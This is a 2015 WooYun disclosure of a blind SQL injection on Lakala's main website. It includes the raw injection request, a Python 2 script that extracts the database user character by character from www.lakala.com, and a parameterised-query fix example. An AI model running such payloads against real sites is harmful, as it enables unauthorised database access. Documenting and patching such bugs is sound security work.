Defect ID: WooYun-2015-0128778
Title: Lakala main site MySQL injection (root, with verification script)
Vendor: Lakala (拉卡拉网络技术有限公司)
Author: 路人甲
Submitted: 2015-07-23 20:32
Disclosed: 2015-09-11 07:42
Vulnerability type: SQL injection
Severity: Medium
Self-assessed Rank: 8
Status: Confirmed by vendor
Tags:
2015-07-23: Details sent to the vendor, awaiting vendor handling
2015-07-28: Vendor confirmed; details visible to the vendor only
2015-08-07: Details disclosed to core white hats and domain experts
2015-08-17: Details disclosed to regular white hats
2015-08-27: Details disclosed to intern white hats
2015-09-11: Details disclosed to the public
Lakala main site MySQL injection (root, with verification script)
Injection point:

```http
POST /index.php?a=clckRelationHelp HTTP/1.1
Content-Length: 177
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.lakala.com
Cookie: PHPSESSID=0da719011942902fb844cd2bd1f40efb
Host: www.lakala.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Accept: */*

helpkey=%' and length(user())=16 and '%'='&lid=0&pageindex=1&pagesize=5&sid=0
```

The helpkey and key parameters are injectable: the value is placed inside a LIKE '%...%' pattern, so a closing quote followed by a condition is evaluated as SQL, and the response's record count acts as a true/false oracle.
Guessing user() character by character:

```
[Done] MySQL user is [email protected]
```

Verification script (Python 2):

```python
#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib

headers = {'Content-Type': 'application/x-www-form-urlencoded',
           'User-Agent': 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)',}

# Character set tried at each position of user(); 16 positions in total
# (length(user())=16 was established with the request above).
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

print '[%s] Start to retrieve MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1, 17):
    for payload in payloads:
        # Boolean condition on the i-th character of user(), wrapped in the
        # same quote-closing helpkey payload as the injection point.
        s = 'ascii(mid(user()from(%s)for(1)))=%s' % (i, ord(payload))
        s = "helpkey=%%' and %s and '%%'='&lid=0&pageindex=1&pagesize=5&sid=0" % s
        conn = httplib.HTTPConnection('www.lakala.com', timeout=30)
        conn.request(method='POST', url='/index.php?a=clckRelationHelp', body=s, headers=headers)
        html_doc = conn.getresponse().read()
        conn.close()
        print '.',
        # Oracle: a true condition returns records, so 'RecordCount:0' is absent.
        if html_doc.find('RecordCount:0') < 0:
            user += payload
            print '\n[in progress]', user,
            break
print '\n[Done] MySQL user is %s' % user
```
Suggested fix: filter the parameters.
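The query shape behind this report, a search term dropped unescaped into a LIKE '%...%' pattern, beside the parameterised form that removes the injection. This is an added example, not the site's code: the sqlite3 table, and the 1=1 / 1=2 probes standing in for the page's length(user()) test, are constructed for illustration.

```python
import sqlite3

# Constructed sample rows standing in for the help-article table that the
# clckRelationHelp search queries (the real schema is not on the page).
HELP_ROWS = [("How to bind a bank card",), ("Refund policy",), ("Reset password",)]

# Boolean-blind probes in the same shape as the page's helpkey payload: close
# the LIKE pattern, append a condition, re-open the quote so the SQL parses.
# 1=1 / 1=2 are constructed stand-ins for the page's length(user())=16 test.
PROBE_TRUE = "%' and 1=1 and '%'='"
PROBE_FALSE = "%' and 1=2 and '%'='"


def _db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE help(title TEXT)")
    conn.executemany("INSERT INTO help VALUES (?)", HELP_ROWS)
    return conn


def count_vulnerable(helpkey):
    """String-built LIKE query: the request parameter becomes SQL text, so an
    attacker-chosen condition decides how many rows come back (the oracle the
    page's script reads as 'RecordCount:0' present or absent)."""
    sql = "SELECT count(*) FROM help WHERE title LIKE '%" + helpkey + "%'"
    return _db().execute(sql).fetchone()[0]


def count_hardened(helpkey):
    """Parameterised LIKE query. The value is bound, never parsed as SQL, and
    LIKE metacharacters are escaped so the caller can only supply a literal
    search term."""
    term = (helpkey.replace("\\", "\\\\")
                   .replace("%", "\\%")
                   .replace("_", "\\_"))
    sql = "SELECT count(*) FROM help WHERE title LIKE ? ESCAPE '\\'"
    return _db().execute(sql, ("%" + term + "%",)).fetchone()[0]


if __name__ == "__main__":
    for probe in (PROBE_TRUE, PROBE_FALSE):
        print("vulnerable:", count_vulnerable(probe), "hardened:", count_hardened(probe))
```

With the vulnerable query the true probe returns every row and the false probe none, which is exactly the oracle the script above exploits; the bound query returns zero rows for both, because the probe is only ever a literal search term.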
Severity: Low
Vulnerability Rank: 1
Confirmed: 2015-07-28 07:40
The vulnerability was introduced by an upgrade; it has been fixed. Many thanks.
None
How did the reporter do the injection, by hand?